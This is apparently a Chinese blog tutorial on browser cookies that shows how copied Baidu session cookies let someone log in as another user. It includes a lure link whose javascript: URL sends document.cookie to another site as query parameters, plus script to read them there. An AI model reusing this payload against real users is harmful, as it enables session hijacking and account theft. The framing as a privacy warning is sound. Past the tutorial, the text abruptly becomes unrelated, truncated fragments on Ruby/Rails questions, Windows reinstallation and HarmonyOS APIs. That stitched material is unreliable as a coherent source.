随着互联网的普及以及一系列可供上网设备的快速发展,截止2022年12月,中国网民规模达10.37亿,较之2021年12月增长3549万,互联网普及率达75.6%;在这么庞大的数据背后又有多少用户的个人信息被泄露呢?
备注:图源网络
在介绍之前,我们首先需要了解什么是cookie,类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。
举例来说, 一个 Web 站点可能会为每一个访问者产生一个唯一的ID, 然后以 Cookie 文件的形式保存在每个用户的机器上。如果使用浏览器访问 Web, 会看到所有保存在硬盘上的 Cookie。
在这个文件夹里每一个文件都是一个由“名/值”对组成的文本文件,另外还有一个文件保存有所有对应的 Web 站点的信息。在这里的每个 Cookie 文件都是一个简单而又普通的文本文件。透过文件名, 就可以看到是哪个 Web 站点在机器上放置了Cookie(当然站点信息在文件里也有保存) 。
所谓“cookie”数据是指某些网站为了辨别用户身份,储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。
通俗来讲就是指缓存数据,包括用户名、密码、注册账户、手机号等公民个人信息。
介绍源自百科
我们在接下来的流程演示中以百度为例。
场景如下:我昨天用百度APP浏览了一些我很感兴趣的内容,今天我在电脑上想再看一下,但是我并没有将那些网址记下来,
(想必大家上网冲浪的时候也没有背诵网址的习惯吧)那只能在这个新的终端通过登录并查看历史浏览记录才能达到这一效果了。
在谷歌浏览器访问百度发现处于未登录的状态,输入账号密码并点击登录,校验信息成功后会返回cookie并跳转或刷新页面。如下图即为登录流程以及成功后的页面显示
那么如何查看cookie呢?
在浏览器右击点击检查
点击上方的Application选项卡
点击左侧的Cookies栏目,即可查看浏览器的cookie信息
现在可以看到有百度的cookie的信息,它是通过不同的网站进行分类,Name列与Value列是类似于键值对的关系进行组合
cookie也看到了,那我现在想要访问一下我的个人中心,需要跳转页面才能实现,那这个过程是不是还需要再次登录呢?
很显然是不用的,这是因为服务器有检测到这个有效cookie,所以后续一系列的访问都会放行让我们顺利通关。
那么可想而知,这个信息如果被别人掌握了,是不是就意味着他们能冒充我们的身份呢?
大腿一拍:“坏了! 我成替身了!!”
市面上有着丰富的浏览器供用户选择使用,如:谷歌、火狐、Edge、等,但是不同的浏览器之间进行cookie的读取显然是不可行的,很简单的一个例子,现在我在百度登录了我的账号,那么我在火狐浏览器访问百度很明显是处于未登录的状态,因为不同的浏览器的cookie就是给各自的浏览器使用的
假设啊,这里我只是假设,假设你的对象截取到了你在谷歌浏览器的cookie并通过别的浏览器登录你的账号,ta该如何操作呢?
首先,ta在火狐浏览器鼠标右键点击检查,点击存储,点击cookie,在下方点击全部删除,将现有cookie清空
然后ta打开了你的谷歌浏览器右键检查,点击Application,点击cookie,将百度服务器返回给你cookie信息一条条复制过去;
当然也可以借助浏览器插件(cookie-editor)批量导出,放到文本编辑器中可以看到就是这种JSON格式的数据
在火狐浏览器同样安装这个插件,将数据复制过来,点击导入,然后刷新页面,可以看到在火狐浏览器没有进行什么账号密码的校验也登录成功了,那是不是意味着ta想干什么都可以呢
这时候大家可能就会说了,我没有对象,没人来截取我的cookie。大话不要说太早,我们首先新建一个html文件,在里面放上一个a标签并写上一些很有诱惑力的语句,这样看上去是不是就很想点一下呢?
<a href="">猜你喜欢,点我有惊喜</a>
我们先通过手动插入的方式给这个网址加入一些cookie,右击检查,选择Application、Cookies,在右侧双击即可添加cookie
随后点击Console选项卡,输入document.cookie,即可输出该网站的所有cookie信息
document.cookie
这时候我们再对上面的超链接修饰一下,跳转到别人用心的人部署的网站,并通过拼接地址栏参数的形式将cookie携带出去
<a href="javascript:location.href='http://www.baidu.com?'+document.cookie">猜你喜欢,点我有惊喜</a>
点击该超链接,可以在地址栏看到刚才我们在那个网址所添加的cookie信息都以参数的形式携带过来了
现在我们已经携带着自己的信息跳转到了别有用心的人的网站,ta如何通过JS获取地址栏参数呢
function GetQueryString(name)
{
var reg = new RegExp( "(^|&)" + name + "=([^&]*)(&|$)" );
var r = window.location.search.substr(1).match(reg);
if (r!= null ) return unescape(r[2]); return null ;
}
// 调用方法
alert(GetQueryString( "参数名1" ));
到了这一步可以说是已经无法挽回了,这也是你时常会收到骚扰电话、短信、盗号提醒的原因之一,希望大家在网上冲浪的时候守护好自己的个人信息
大约一年前,我决定确保每个包含非唯一文本的Flash通知都将从模块中的方法中获取文本。我这样做的最初原因是为了避免一遍又一遍地输入相同的字符串。如果我想更改措辞,我可以在一个地方轻松完成,而且一遍又一遍地重复同一件事而出现拼写错误的可能性也会降低。我最终得到的是这样的:moduleMessagesdefformat_error_messages(errors)errors.map{|attribute,message|"Error:#{attribute.to_s.titleize}#{message}."}enddeferror_message_could_not_find(obje
我主要使用Ruby来执行此操作,但到目前为止我的攻击计划如下:使用gemsrdf、rdf-rdfa和rdf-microdata或mida来解析给定任何URI的数据。我认为最好映射到像schema.org这样的统一模式,例如使用这个yaml文件,它试图描述数据词汇表和opengraph到schema.org之间的转换:#SchemaXtoschema.orgconversion#data-vocabularyDV:name:namestreet-address:streetAddressregion:addressRegionlocality:addressLocalityphoto:i
我正在使用Rails构建一个简单的聊天应用程序。当用户输入url时,我希望将其输出为html链接(即“url”)。我想知道在Ruby中是否有任何库或众所周知的方法可以做到这一点。如果没有,我有一些不错的正则表达式示例代码可以使用... 最佳答案 查看auto_linkRails提供的辅助方法。这会将所有URL和电子邮件地址变成可点击的链接(htmlanchor标记)。这是文档中的代码示例。auto_link("Gotohttp://www.rubyonrails.organdsayhellotodavid@loudthinking.
所以我开始关注ruby,很多东西看起来不错,但我对隐式return语句很反感。我理解默认情况下让所有内容返回self或nil但不是语句的最后一个值。对我来说,它看起来非常脆弱(尤其是)如果你正在使用一个不打算返回某些东西的方法(尤其是一个改变状态/破坏性方法的函数!),其他人可能最终依赖于一个返回对方法的目的并不重要,并且有很大的改变机会。隐式返回有什么意义?有没有办法让事情变得更简单?总是有返回以防止隐含返回被认为是好的做法吗?我是不是太担心这个了?附言当人们想要从方法中返回特定的东西时,他们是否经常使用隐式返回,这不是让你组中的其他人更容易破坏彼此的代码吗?当然,记录一切并给出
给定以下方法:defsome_method:valueend以下语句按我的预期工作:some_method||:other#=>:valuex=some_method||:other#=>:value但是下面语句的行为让我感到困惑:some_method=some_method||:other#=>:other它按预期创建了一个名为some_method的局部变量,随后对some_method的调用返回该局部变量的值。但为什么它分配:other而不是:value呢?我知道这可能不是一件明智的事情,并且可以看出它可能有多么模棱两可,但我认为应该在考虑作业之前评估作业的右侧...我已经在R
我在我的Rails3示例应用程序上使用CarrierWave。我想验证远程位置上传,因此当用户提交无效URL(空白或非图像)时,我不会收到标准错误异常:CarrierWave::DownloadErrorinImageController#createtryingtodownloadafilewhichisnotservedoverHTTP这是我的模型:classPaintingtrue,:length=>{:minimum=>5,:maximum=>100}validates:image,:presence=>trueend这是我的Controller:classPaintingsC
我正在尝试用Prawn生成PDF。在我的PDF模板中,我有带单元格的表格。在其中一个单元格中,我有一个电子邮件地址:cell_email=pdf.make_cell(:content=>booking.user_email,:border_width=>0)我想让电子邮件链接到“mailto”链接。我知道我可以这样链接:pdf.formatted_text([{:text=>booking.user_email,:link=>"mailto:#{booking.user_email}"}])但是将这两行组合起来(将格式化文本作为内容)不起作用:cell_email=pdf.make_c
电脑0x0000001A蓝屏错误怎么U盘重装系统教学分享。有用户电脑开机之后遇到了系统蓝屏的情况。系统蓝屏问题很多时候都是系统bug,只有通过重装系统来进行解决。那么蓝屏问题如何通过U盘重装新系统来解决呢?来看看以下的详细操作方法教学吧。 准备工作: 1、U盘一个(尽量使用8G以上的U盘)。 2、一台正常联网可使用的电脑。 3、ghost或ISO系统镜像文件(Win10系统下载_Win10专业版_windows10正式版下载-系统之家)。 4、在本页面下载U盘启动盘制作工具:系统之家U盘启动工具。 U盘启动盘制作步骤: 注意:制作期间,U盘会被格式化,因此U盘中的重要文件请注
在应用开发中,有时候我们需要获取系统的设备信息,用于数据上报和行为分析。那在鸿蒙系统中,我们应该怎么去获取设备的系统信息呢,比如说获取手机的系统版本号、手机的制造商、手机型号等数据。1、获取方式这里分为两种情况,一种是设备信息的获取,一种是系统信息的获取。1.1、获取设备信息获取设备信息,鸿蒙的SDK包为我们提供了DeviceInfo类,通过该类的一些静态方法,可以获取设备信息,DeviceInfo类的包路径为:ohos.system.DeviceInfo.具体的方法如下:ModifierandTypeMethodDescriptionstatic StringgetAbiList()Obt
我正在研究使用EventMachine支持的twitter-streamrubygem来跟踪和捕获推文。我对整个事件编程有点陌生。我如何判断我在事件循环中所做的任何处理是否导致我落后?有没有简单的检查方法? 最佳答案 您可以通过使用周期性计时器并打印出耗时来确定延迟。如果您使用的是1秒的计时器,您应该已经过了大约1秒,如果它更长,您就知道您正在减慢react器的速度。@last=Time.now.to_fEM.add_periodic_timer(1)doputs"LATENCY:#{Time.now.to_f-@last}"@